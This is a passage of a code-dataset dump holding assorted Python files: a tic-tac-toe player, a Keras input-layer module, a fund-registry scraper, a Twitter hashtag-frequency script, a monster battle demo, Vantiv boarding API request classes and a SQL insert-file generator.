FieldType.O:\n return 'O'\n else:\n raise RuntimeError('Unknown FieldType for Player')\n\n\n def grid_to_list(self,grid):\n s = ''\n for y in range (0,3):\n for x in range (0, 3):\n if grid.get_field(x, y) == FieldType.EMPTY:\n s += '-'\n elif grid.get_field(x, y) == FieldType.O:\n s += 'O'\n elif grid.get_field(x, y) == FieldType.X:\n s += 'X'\n else:\n raise RuntimeError('Unkwon FieldType on Board')\n\n return s\n\n def choose_field(self, grid):\n grid_str = self.grid_to_list(grid)\n player_str = self.get_str_player()\n\n cost, move = ai_service.nextMove(list(grid_str), player_str)\n\n x = int(move % 3)\n y = int(move / 3)\n\n\n allowed = False\n while not allowed:\n field = Field(x, y)\n allowed = yield field\n if allowed:\n yield None\n else:\n print(\"Try it again, field is already chosen.\\n\")","sub_path":"pytictactoe/player/clever_player.py","file_name":"clever_player.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615298866","text":"import tkinter as tk\n\nclass NotsCrosses(tk.Frame):\n def __init__(self, parent):\n tk.Frame.__init__(self, parent)\n #Title\n\n #Board\n #Add tiles\n\n #Menu buttons\n\nroot = tk.Tk()\nroot.geometry(\"400x500\")\n\napp = NotsCrosses(root)\napp.pack()\nroot.mainloop()","sub_path":"Bad NC/NotsCrossesGUI.py","file_name":"NotsCrossesGUI.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286156037","text":"\"\"\"Input layer code (`Input` and `InputLayer`).\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom .base_layer import Layer\nfrom .base_layer import Node\nfrom .. import backend as K\nfrom ..legacy import interfaces\n\n\nclass InputLayer(Layer):\n \"\"\"Layer to be used as an entry point into a model.\n\n It can either wrap an existing tensor (pass an `input_tensor` argument)\n or create its a placeholder tensor (pass arguments `input_shape`\n or `batch_input_shape` as well as `dtype`).\n\n # Arguments\n input_shape: Shape tuple, not including the batch axis.\n batch_size: Optional input batch size (integer or None).\n batch_input_shape: Shape tuple, including the batch axis.\n dtype: Datatype of the input.\n input_tensor: Optional tensor to use as layer input\n instead of creating a placeholder.\n sparse: Boolean, whether the placeholder created\n is meant to be sparse.\n name: Name of the layer (string).\n \"\"\"\n\n @interfaces.legacy_input_support\n def __init__(self, input_shape=None, batch_size=None,\n batch_input_shape=None,\n dtype=None, input_tensor=None, sparse=False, name=None):\n if not name:\n prefix = 'input'\n name = prefix + '_' + str(K.get_uid(prefix))\n super(InputLayer, self).__init__(dtype=dtype, name=name)\n\n self.trainable = False\n self.built = True\n self.sparse = sparse\n\n if input_shape and batch_input_shape:\n raise ValueError('Only provide the input_shape OR '\n 'batch_input_shape argument to '\n 'InputLayer, not both at the same time.')\n if input_tensor is not None and batch_input_shape is None:\n # If input_tensor is set, and batch_input_shape is not set:\n # Attempt automatic input shape inference.\n try:\n batch_input_shape = K.int_shape(input_tensor)\n except TypeError:\n if not input_shape and not batch_input_shape:\n raise ValueError('InputLayer was provided '\n 'an input_tensor argument, '\n 'but its input shape cannot be '\n 'automatically inferred. '\n 'You should pass an input_shape or '\n 'batch_input_shape argument.')\n if not batch_input_shape:\n if not input_shape:\n raise ValueError('An Input layer should be passed either '\n 'a `batch_input_shape` or an `input_shape`.')\n else:\n batch_input_shape = (batch_size,) + tuple(input_shape)\n else:\n batch_input_shape = tuple(batch_input_shape)\n\n if not dtype:\n if input_tensor is None:\n dtype = K.floatx()\n else:\n dtype = K.dtype(input_tensor)\n\n self.batch_input_shape = batch_input_shape\n self.dtype = dtype\n\n if input_tensor is None:\n self.is_placeholder = True\n input_tensor = K.placeholder(shape=batch_input_shape,\n dtype=dtype,\n sparse=self.sparse,\n name=self.name)\n else:\n self.is_placeholder = False\n input_tensor._keras_shape = batch_input_shape\n # Create an input node to add to self.outbound_node\n # and set output_tensors' _keras_history.\n input_tensor._uses_learning_phase = False\n input_tensor._keras_history = (self, 0, 0)\n Node(self,\n inbound_layers=[],\n node_indices=[],\n tensor_indices=[],\n input_tensors=[input_tensor],\n output_tensors=[input_tensor],\n input_masks=[None],\n output_masks=[None],\n input_shapes=[batch_input_shape],\n output_shapes=[batch_input_shape])\n\n def get_config(self):\n config = {'batch_input_shape': self.batch_input_shape,\n 'dtype': self.dtype,\n 'sparse': self.sparse,\n 'name': self.name}\n return config\n\n\ndef Input(shape=None, batch_shape=None,\n name=None, dtype=None, sparse=False,\n tensor=None):\n \"\"\"`Input()` is used to instantiate a Keras tensor.\n\n A Keras tensor is a tensor object from the underlying backend\n (Theano, TensorFlow or CNTK), which we augment with certain\n attributes that allow us to build a Keras model\n just by knowing the inputs and outputs of the model.\n\n For instance, if a, b and c are Keras tensors,\n it becomes possible to do:\n `model = Model(input=[a, b], output=c)`\n\n The added Keras attributes are:\n `_keras_shape`: Integer shape tuple propagated\n via Keras-side shape inference.\n `_keras_history`: Last layer applied to the tensor.\n the entire layer graph is retrievable from that layer,\n recursively.\n\n # Arguments\n shape: A shape tuple (integer), not including the batch size.\n For instance, `shape=(32,)` indicates that the expected input\n will be batches of 32-dimensional vectors.\n batch_shape: A shape tuple (integer), including the batch size.\n For instance, `batch_shape=(10, 32)` indicates that\n the expected input will be batches of 10 32-dimensional vectors.\n `batch_shape=(None, 32)` indicates batches of an arbitrary number\n of 32-dimensional vectors.\n name: An optional name string for the layer.\n Should be unique in a model (do not reuse the same name twice).\n It will be autogenerated if it isn't provided.\n dtype: The data type expected by the input, as a string\n (`float32`, `float64`, `int32`...)\n sparse: A boolean specifying whether the placeholder\n to be created is sparse.\n tensor: Optional existing tensor to wrap into the `Input` layer.\n If set, the layer will not create a placeholder tensor.\n\n # Returns\n A tensor.\n\n # Example\n\n ```python\n # this is a logistic regression in Keras\n x = Input(shape=(32,))\n y = Dense(16, activation='softmax')(x)\n model = Model(x, y)\n ```\n \"\"\"\n if not batch_shape and tensor is None:\n assert shape is not None, ('Please provide to Input either a `shape`'\n ' or a `batch_shape` argument. Note that '\n '`shape` does not include the batch '\n 'dimension.')\n if shape is not None and not batch_shape:\n batch_shape = (None,) + tuple(shape)\n if not dtype:\n dtype = K.floatx()\n input_layer = InputLayer(batch_input_shape=batch_shape,\n name=name, dtype=dtype,\n sparse=sparse,\n input_tensor=tensor)\n # Return tensor including _keras_shape and _keras_history.\n # Note that in this case train_output and test_output are the same pointer.\n outputs = input_layer._inbound_nodes[0].output_tensors\n if len(outputs) == 1:\n return outputs[0]\n else:\n return outputs\n","sub_path":"deep_learning/keras/keras/engine/input_layer.py","file_name":"input_layer.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472242346","text":"''' \n4)Given the participants' score sheet for your University Sports Day. you are required to find the runner-up score.\n You are given n scores. Store them in a list and find the score of the runner-up.\n Input Format: The first line contains n . The second line contains an array A[] of n integers each separated by a space.\n Constraints : 2≤n≤5\n -100≤A[i]≤100\n Output Format : Print the runner-up score.\n Sample Input : 5\n 2 3 6 6 5\n Sample Output : 5\n '''\n\nn = int(input(\"Enter limit : \"))\nprint(\"Enter array elements : \")\na = []\nif(2 <= n and n <= 5):\n a = [int(x) for x in input().split(\" \")]\n\n# way 1 - using set to find second runner-up\ns = list(set(a))\nprint(s[n-2])\n\n# way 2 - using sort() function\na.sort()\nprint(a[-2])\n\n# way 3 - using manual code\n\nmax = max(a[0], a[1])\nsecmax = min(a[0], a[1])\nfor i in range(2, len(a)):\n if(a[i] > max):\n secmax = max\n max = a[i]\n elif(a[i] > secmax and max != a[i]):\n secmax = a[i]\nprint(secmax)\n","sub_path":"Day2_Assignments/qn4.py","file_name":"qn4.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215633264","text":"import requests\nimport json\nimport time\nimport sqlite3\nfrom tqdm import tqdm\nfrom openpyxl import Workbook\nimport sys\n# 浏览器信息\nheaders = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"2\",\n \"Content-Type\": \"application/json\",\n \"Host\": \"gs.amac.org.cn\",\n \"Origin\": \"http://gs.amac.org.cn\",\n \"Referer\": \"http://gs.amac.org.cn/amac-infodisc/res/pof/manager/index.html\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n}\n\nrequest_params = {} # 这个是json请求,是直接发送给服务器的,所以需要先序列化, 使用通用型的web传输的惯用序列化标准,json来序列化\n\n\n# 遍历获取每一页要post到服务器的参数\ndef get_post_params(page):\n post_params = {\n 'rand': '0.034480063759529056',\n 'page': page,\n 'size': '20'\n } # 这些请求参数如果出现在地址栏中, 那么需要使用urlencode方法将这些参数编码\n return post_params\n\n\n# 获取每页的关键信息,并添加到excel中\ndef iter_list_values(post_params):\n response = requests.post('http://gs.amac.org.cn/amac-infodisc/api/pof/manager?', params=post_params,\n data=json.dumps(request_params), headers=headers) # json 请求, params 是请求参数,data是json请求\n for i in range(20):\n list_values = [json.loads(response.text)['content'][i][x] for x in\n 'managerName fundScale fundCount officeAddress officeProvince primaryInvestType'.split()]\n yield list_values\n\n# 写入数据库\ndef create_table():\n global creat_table_sql, i, post_params, iter_list_val\n with db_connection:\n creat_table_sql = \"\"\"CREATE TABLE IF NOT EXISTS %s (公司名称 TEXT, 管理规模 FLOAT, 产品数量 INT, 办公地址 TEXT, 省份 TEXT, 牌照类型 TEXT)\"\"\" % table_time_str\n db_connection.execute(creat_table_sql)\n # iter_list_val = iter_list_values(post_params=get_post_params(pages)) # 获取每页的条目的迭代器\n for i in tqdm(range(pages)): # 获取所有1211页的条目\n post_params = get_post_params(i)\n iter_list_val = iter_list_values(post_params)\n db_connection.executemany(\"INSERT INTO %s VALUES(?,?,?,?,?,?)\" % table_time_str, iter_list_val)\n # count = db_connection.execute('SELECT count(*) FROM %s' % table_time_str).fetchall()[0][0]\n # print('本次获取到%s条记录'%count)\n\n\ndef export_to_excel():\n global run_click\n export_excel = '日期' + str(run_click)\n db_connection = sqlite3.connect('./simu2.db')\n table_names = db_connection.execute(\n \"\"\"SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name\"\"\").fetchall()\n try:\n table_names_list = [x[0] for x in table_names] # 如果列表不报超出下标的错误\n except:\n print('数据库无任何表!')\n else:\n if export_excel in table_names_list:\n wb = Workbook()\n sheet = wb.active\n sheet.column_dimensions['A'].width = 50\n sheet.column_dimensions['B'].width = 12\n sheet.column_dimensions['C'].width = 9\n sheet.column_dimensions['D'].width = 70\n sheet.column_dimensions['E'].width = 8\n sheet.column_dimensions['F'].width = 30\n table_head = ['公司名称', '管理规模', '产品数量', '办公地址', '省份', '牌照类型']\n sheet.append(table_head)\n data = db_connection.execute('SELECT * FROM %s' % export_excel)\n print('正在导出excel,请稍后...')\n for i in tqdm(data):\n sheet.append(i)\n wb.save(export_excel + '.xlsx')\n print('导出完毕,文件命名为“%s.xlsx”'%export_excel)\n else:\n print('不存在名为“%s”的表!可导出的表有:%s' % (export_excel, table_names_list))\n\n\n# 主函数\nif __name__ == '__main__':\n run_click = input('开始抓取最新数据请直接按回车。如需导出某天的数据,请输入日期(例如:20181105)并按回车:')\n\n t_start = time.clock()\n\n if run_click:\n export_to_excel()\n else:\n pages = 1211\n table_time_str = \"日期\"+time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n db_connection = sqlite3.connect('./simu2.db')\n table_names = db_connection.execute(\"\"\"SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name\"\"\").fetchall() # 返回元素为一个元素为元组的列表\n try:\n table_names_list = [x[0] for x in table_names ] #如果列表不报超出下标的错误\n except: #如果报错,那么说明从未创建过表,则开始创建数据库表\n print('创建数据库表...')\n create_table()\n else: #否则说明不报超出下标的错误,既数据库里有数据表,还需要判断今天的表是否存在过\n if table_time_str not in table_names_list:\n create_table()\n else:\n print('数据库中表名为“%s”的表已存在!'%table_time_str)\n re_run_programs = input('如需覆盖今天所生成表,请输入yes并按回车:')\n if re_run_programs =='yes':\n db_connection.execute('drop TABLE %s'%table_time_str)\n db_connection.commit()\n create_table()\n t_end = time.clock()\n t =int(t_end-t_start)\n print('任务完成,耗时%s秒...'%t)\n quit_program = input('按回车键退出程序...')\n if quit_program == \"\":\n sys.exit()\n\n\n\n","sub_path":"aiohttp_test/funds_get_db.py","file_name":"funds_get_db.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504812572","text":"#########################################\n##### Name: rui sun #####\n##### Uniqname: rayss #####\n#########################################\n\nfrom requests_oauthlib import OAuth1\nimport json\nimport requests\nimport csv\n\nimport hw6_secrets_starter as secrets # file that contains your OAuth credentials\n\nCACHE_FILENAME = \"twitter_cache.json\"\nCACHE_DICT = {}\n\nclient_key = secrets.TWITTER_API_KEY\nclient_secret = secrets.TWITTER_API_SECRET\naccess_token = secrets.TWITTER_ACCESS_TOKEN\naccess_token_secret = secrets.TWITTER_ACCESS_TOKEN_SECRET\n\noauth = OAuth1(client_key,\n client_secret=client_secret,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret)\n\ndef open_stop_word():\n with open('stop-word-list.csv', newline='') as csvfile:\n stop_word = list(csv.reader(csvfile, delimiter=','))\n stop_word = stop_word[0]\n result = []\n for word in stop_word:\n result.append(word.strip())\n result.append('rt')\n\n return result\n\ndef test_oauth():\n ''' Helper function that returns an HTTP 200 OK response code and a \n representation of the requesting user if authentication was \n successful; returns a 401 status code and an error message if \n not. Only use this method to test if supplied user credentials are \n valid. Not used to achieve the goal of this assignment.'''\n\n url = \"https://api.twitter.com/1.1/account/verify_credentials.json\"\n auth = OAuth1(client_key, client_secret, access_token, access_token_secret)\n authentication_state = requests.get(url, auth=auth)#.json()\n return authentication_state\n\n\ndef open_cache():\n ''' Opens the cache file if it exists and loads the JSON into\n the CACHE_DICT dictionary.\n if the cache file doesn't exist, creates a new cache dictionary\n \n Parameters\n ----------\n None\n \n Returns\n -------\n The opened cache: dict\n '''\n try:\n cache_file = open(CACHE_FILENAME, 'r')\n cache_contents = cache_file.read()\n cache_dict = json.loads(cache_contents)\n cache_file.close()\n except:\n cache_dict = {}\n return cache_dict\n\n\ndef save_cache(cache_dict):\n ''' Saves the current state of the cache to disk\n \n Parameters\n ----------\n cache_dict: dict\n The dictionary to save\n \n Returns\n -------\n None\n '''\n dumped_json_cache = json.dumps(cache_dict)\n fw = open(CACHE_FILENAME,\"w\")\n fw.write(dumped_json_cache)\n fw.close() \n\n\ndef construct_unique_key(baseurl, params):\n ''' constructs a key that is guaranteed to uniquely and \n repeatably identify an API request by its baseurl and params\n\n AUTOGRADER NOTES: To correctly test this using the autograder, use an underscore (\"_\") \n to join your baseurl with the params and all the key-value pairs from params\n E.g., baseurl_key1_value1\n \n Parameters\n ----------\n baseurl: string\n The URL for the API endpoint\n params: dict\n A dictionary of param:value pairs\n \n Returns\n -------\n string\n the unique key as a string\n '''\n s = baseurl\n for key, val in params.items():\n s = s + '_' + str(key).lower() + '_' + str(val).lower()\n \n return s\n\ndef make_request(baseurl, params):\n '''Make a request to the Web API using the baseurl and params\n \n Parameters\n ----------\n baseurl: string\n The URL for the API endpoint\n params: dictionary\n A dictionary of param:value pairs\n \n Returns\n -------\n dict\n the data returned from making the request in the form of \n a dictionary\n '''\n response = requests.get(baseurl, \n params=params, \n auth=oauth)\n\n results = response.json()\n return results\n \ndef make_request_with_cache(baseurl, hashtag, count):\n '''Check the cache for a saved result for this baseurl+params:values\n combo. If the result is found, return it. Otherwise send a new \n request, save it, then return it.\n\n AUTOGRADER NOTES: To test your use of caching in the autograder, please do the following:\n If the result is in your cache, print \"fetching cached data\"\n If you request a new result using make_request(), print \"making new request\"\n\n Do no include the print statements in your return statement. Just print them as appropriate.\n This, of course, does not ensure that you correctly retrieved that data from your cache, \n but it will help us to see if you are appropriately attempting to use the cache.\n \n Parameters\n ----------\n baseurl: string\n The URL for the API endpoint\n hashtag: string\n The hashtag to search for\n count: integer\n The number of results you request from Twitter\n \n Returns\n -------\n dict\n the results of the query as a dictionary loaded from cache\n JSON\n '''\n params = {'q': hashtag, 'count': count}\n request_key = construct_unique_key(baseurl, params)\n results = open_cache()\n for key, val in results.items():\n if key == 'request_key' and val == request_key:\n print('fetching cached data')\n return results\n\n results = make_request(baseurl, params)\n print(\"making new request\")\n results['request_key'] = request_key\n save_cache(results)\n return results\n \n\n\ndef find_most_common_cooccurring_hashtag(tweet_data, hashtag_to_ignore):\n ''' Finds the hashtag that most commonly co-occurs with the hashtag\n queried in make_request_with_cache().\n\n Parameters\n ----------\n tweet_data: dict\n Twitter data as a dictionary for a specific query\n hashtag_to_ignore: string\n the same hashtag that is queried in make_request_with_cache() \n (e.g. \"#MarchMadness2021\")\n\n Returns\n -------\n list\n the top 3 ihashtag that co-occurs with the hashtag \n queried in make_request_with_cache()\n\n '''\n results = tweet_data['statuses']\n hashtags = {}\n for result in results:\n if result['entities']['hashtags'] != None:\n for hashtag in result['entities']['hashtags']:\n if ((hashtag_to_ignore[1:].lower() in hashtag['text'].lower()) or (hashtag['text'].lower() in hashtag_to_ignore[1:].lower())):\n pass\n else:\n if hashtag['text'].lower() in list(hashtags.keys()):\n hashtags[hashtag['text'].lower()] += 1\n else:\n hashtags[hashtag['text'].lower()] = 1\n\n cooccur_hashtag = []\n for i in range(3):\n num = 0\n for key, val in hashtags.items():\n if val > num:\n num = val\n top_hashtag = key\n if num == 0:\n break\n cooccur_hashtag.append('#'+top_hashtag)\n del hashtags[top_hashtag]\n\n return cooccur_hashtag\n\ndef find_most_common_occurring_words(tweet_data):\n results = tweet_data['statuses']\n words_dict = {}\n stop_word = open_stop_word()\n for result in results:\n if result['text'] != None:\n words = result['text'].split(' ')\n for word in words:\n if word == '':\n continue\n if (word.lower() in stop_word) or word[0] == '#':\n pass\n else:\n if word.lower() in list(words_dict.keys()):\n words_dict[word.lower()] += 1\n else:\n words_dict[word.lower()] = 1\n\n\n cooccur_words = {}\n for i in range(10):\n num = 0\n for key, val in words_dict.items():\n if val > num:\n num = val\n top_word = key\n if num == 0:\n break\n cooccur_words[top_word] = num\n del words_dict[top_word]\n\n return cooccur_words\n \n\nif __name__ == \"__main__\":\n if not client_key or not client_secret:\n print(\"You need to fill in CLIENT_KEY and CLIENT_SECRET in secret_data.py.\")\n exit()\n if not access_token or not access_token_secret:\n print(\"You need to fill in ACCESS_TOKEN and ACCESS_TOKEN_SECRET in secret_data.py.\")\n exit()\n print(test_oauth())\n\n CACHE_DICT = open_cache()\n\n baseurl = \"https://api.twitter.com/1.1/search/tweets.json\"\n while(True):\n hashtag = input(\"What hashtag you want to search? \")\n if hashtag == 'exit':\n break\n else:\n hashtag = '#' + hashtag\n count = 100\n\n tweet_data = make_request_with_cache(baseurl, hashtag, count)\n top_three_cooccurring_hashtag = find_most_common_cooccurring_hashtag(tweet_data, hashtag)\n if top_three_cooccurring_hashtag == []:\n print(\"There are no coocurring hashtags\")\n else:\n print(\"The top three cooccurring hashtag with {} is {}.\".format(hashtag, top_three_cooccurring_hashtag))\n\n top_ten_occuring_words = find_most_common_occurring_words(tweet_data)\n if top_ten_occuring_words == {}:\n print(\"There are no occuring words\")\n else:\n print(\"The top ten occurring words with {} is shown below along with the frequency.\".format(hashtag))\n i = 1\n for key, val in top_ten_occuring_words.items():\n print(f'{i}: {key} occurs {val} times')\n i += 1","sub_path":"hw5-twitter-ec.py","file_name":"hw5-twitter-ec.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231702731","text":"# -*- coding:utf-8 -*-\n\n\nclass Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n\n temp = x\n rev = 0\n while temp > 0:\n rev = rev * 10 + temp % 10\n temp = temp // 10\n\n if rev == x:\n return True\n return False\n\n\nif __name__ == \"__main__\":\n x = 110\n print(Solution.isPalindrome(None, x))\n","sub_path":"0009.pn.py","file_name":"0009.pn.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"254569440","text":"def create_monster(name, species):\n monster = {\n 'name': name,\n 'species': species,\n }\n\n monster['hit_points'] = initial_hit_points(monster)\n return monster\n\n\ndef describe(monster):\n if monster['hit_points'] > 0:\n print('{} is a {} with {} hit points'.format(monster['name'], monster['species'], monster['hit_points']))\n else:\n print('{} is a dead {}'.format(monster['name'], monster['species']))\n\n\ndef damage(monster, damage_points):\n if monster['hit_points'] > 0:\n monster['hit_points'] -= damage_points\n if monster['hit_points'] <= 0:\n print('{} is dead'.format(monster['name']))\n else:\n print('{} is already dead'.format(monster['name']))\n\n\ndef heal(monster):\n if monster['hit_points'] > 0:\n monster['hit_points'] = initial_hit_points(monster)\n else:\n print('A dead monster cannot be healed')\n\n\ndef initial_hit_points(monster):\n if monster['species'] == 'Giant':\n return 10\n elif monster['species'] == 'Dragon':\n return 20\n elif monster['species'] == 'Wyvern':\n return 15\n else:\n # This is a way of telling Python \"this should never happen\"\n assert False\n\n\ndef attack(monster, other_monster):\n if monster['hit_points'] > 0:\n print('{} attacks {}'.format(monster['name'], other_monster['name']))\n damage(other_monster, attack_points(monster))\n else:\n print('A dead monster cannot attack')\n\n\ndef attack_points(monster):\n if monster['species'] == 'Giant':\n return 3\n elif monster['species'] == 'Dragon':\n return 4\n elif monster['species'] == 'Wyvern':\n return 5\n else:\n assert False\n\n\nif __name__ == '__main__':\n gerald = create_monster('Gerald', 'Giant')\n debbie = create_monster('Debbie', 'Dragon')\n wallace = create_monster('Wallace', 'Wyvern')\n\n describe(gerald)\n describe(debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n describe(gerald)\n describe(debbie)\n","sub_path":"monsters02.py","file_name":"monsters02.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309098463","text":"from . .Request import Request\nfrom .schemas import (CreateLegalEntitySchema, CreateSubMerchantSchema,\n RetrieveLegalEntitySchema, RetrieveMccListSchema,\n RetrieveSubMerchantSchema, UpdateLegalEntitySchema,\n UpdateSubMerchantSchema)\n\n\nclass CreateLegalEntity (Request):\n __schema__ = CreateLegalEntitySchema\n\n Address = None\n Credentials = None\n LegalEntity = None\n Principal = None\n PrincipalArray = None\n\n def __init__(self):\n super(CreateLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"createLegalEntity\",\n \"POST\")\n\n\nclass CreateSubMerchant (Request):\n __schema__ = CreateSubMerchantSchema\n\n Address = None\n Credentials = None\n ECheck = None\n Merchant = None\n PrimaryContact = None\n SubMerchantFunding = None\n\n def __init__(self, entityID):\n super(CreateSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"createSubMerchant\",\n \"POST\")\n self.queryParams['entityID'] = entityID\n\n\nclass RetrieveLegalEntity (Request):\n __schema__ = RetrieveLegalEntitySchema\n\n def __init__(self, entityID):\n super(RetrieveLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"retrieveLegalEntity\",\n \"GET\")\n self.queryParams['entityID'] = entityID\n\n\nclass RetrieveMccList (Request):\n __schema__ = RetrieveMccListSchema\n\n def __init__(self):\n super(RetrieveMccList, self).__init__(\"boarding\",\n \"services\",\n \"retrieveMccList\",\n \"GET\")\n\n\nclass RetrieveSubMerchant (Request):\n __schema__ = RetrieveSubMerchantSchema\n\n def __init__(self, entityID, subMerchantID):\n super(RetrieveSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"retrieveSubMerchant\",\n \"GET\")\n self.queryParams['entityID'] = entityID\n self.queryParams['subMerchantID'] = subMerchantID\n\n\nclass UpdateLegalEntity (Request):\n __schema__ = UpdateLegalEntitySchema\n\n Address = None\n BackgroundCheckFields = None\n Credentials = None\n LegalEntity = None\n Principal = None\n PrincipalArray = None\n\n def __init__(self, entityID):\n super(UpdateLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"updateLegalEntity\",\n \"PUT\")\n self.queryParams['entityID'] = entityID\n\n\nclass UpdateSubMerchant (Request):\n __schema__ = UpdateSubMerchantSchema\n\n Address = None\n Credentials = None\n ECheck = None\n Merchant = None\n PrimaryContact = None\n SubMerchantFunding = None\n\n def __init__(self, entityID, subMerchantID):\n super(UpdateSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"updateSubMerchant\",\n \"PUT\")\n self.queryParams['entityID'] = entityID\n self.queryParams['subMerchantID'] = subMerchantID\n","sub_path":"vantiv/request/boarding/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567171809","text":"from __future__ import print_function\nimport os\nimport sys\n\n'''\nINSERT INTO table_name ( field1, field2,...fieldN )\n VALUES\n ( value1, value2,...valueN );\n'''\n\ndef insert(table, qfields, qval):\n qfile = open(\"query.sql\", \"a\")\n qstring = \"INSERT INTO \"+table+\" \"+\" (\"+qfields+\") VALUES (\"+qval+\");\"\n qfile.write(qstring+\"\\n\")\n qfile.close()\n\n\ndef readfile(fname, facname):\n f = open(fname,'r');\n line = f.readline()\n line.strip()\n qfields = \"\"\n qval = \"\"\n name = \"\"\n while(line!=''):\n if(\"$\" in line):\n valtoinsert = line.split('$')[1]\n valtoinsert = valtoinsert.rstrip(\"\\n\")\n if(\"PUBLICATIONS\" in line or \"AWARDS\" in line):\n break\n if(\"NAME\" in line):\n qfields = qfields + \"name\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n name = valtoinsert\n if(\"DESG\" in line):\n qfields = qfields + \"designation\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"WEB\" in line):\n qfields = qfields + \"website\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"EMAIL\" in line):\n qfields = qfields + \"email\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"PHONE\" in line):\n qfields = qfields + \"phone\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"RESP\" in line):\n qfields = qfields + \"responsibility\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"RESAREA\" in line):\n qfields = qfields + \"research_area\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n line = f.readline() \n qval = qval[:-1]\n qfields = qfields[:-1]\n insert(\"info\", qfields, qval)\n \n if(\"AWARDS\" in line):\n qfields = \"\"\n qval = \"\"\n qfields = \"name, award\"\n line = f.readline()\n award = line.rstrip('\\r\\n')\n qval = qval + \"'\" + name + \"','\" + award + \"'\"\n insert(\"awards\", qfields, qval)\n line = f.readline()\n \n qfields = \"\"\n qval = \"\"\n if(\"PUBLICATIONS\" in line):\n line = f.readline() #Advance one line after publication\n ''' Insert publications '''\n qfields = \"name, year, title\"\n while(line!=''):\n if('PROJECTS' in line or 'STUDENTS' in line):\n break\n year = int(line)\n title = f.readline()\n tile = title.rstrip('\\r\\n')\n f.readline()\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + str(year) + \",\" \n qval = qval + \"'\" + title[:-1] + \"',\"\n qval = qval[:-1]\n insert(\"publications\", qfields, qval)\n line = f.readline()\n\n qval = \"\"\n qfields = \"name, title\"\n line = f.readline()\n while(line!=''):\n if('STUDENTS' in line):\n break\n title = line.rstrip('\\r\\n')\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + \"'\" + title + \"',\"\n qval = qval[:-1]\n insert(\"projects\", qfields, qval)\n line = f.readline()\n if(line[0] == '\\n'):\n line = f.readline()\n \n qval = \"\"\n qfields = \"name, student_name, student_type, student_research_area\"\n line = f.readline()\n student_type = line.rstrip('\\r\\n')\n \n while(line!=''):\n if('STUDENTS' in line):\n student_type = line.rstrip('\\r\\n')\n line = f.readline()\n line = line.rstrip('\\r\\n')\n if('Area of Research:' in line):\n splitname = line.split('Area of Research:')\n student_name = splitname[0]\n r_area = splitname[1].rstrip('\\n\\r')\n else: \n student_name = line\n r_area = \"\"\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + \"'\" + student_name + \"',\"\n qval = qval + \"'\" + student_type + \"',\"\n qval = qval + \"'\" + r_area + \"',\"\n qval = qval[:-1]\n insert(\"students\", qfields, qval)\n line = f.readline()\n if(line[0] == '\\n'):\n line = f.readline()\n\n\ndeletestring = \"delete from info where 1;\\ndelete from publications where 1;\\ndelete from students where 1;\\ndelete from projects where 1;\\ndelete from awards where 1;\\n\"\n\ndef main():\n #os.remove(\"query.sql\")\n qfile = open(\"query.sql\", \"w\")\n qfile.write(deletestring)\n qfile.close()\n files = os.listdir(\"./databaseinp\")\n for fname in files:\n readfile(\"./databaseinp/\"+fname, fname)\n\n\nif __name__=='__main__':\n main()","sub_path":"insertdb.py","file_name":"insertdb.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 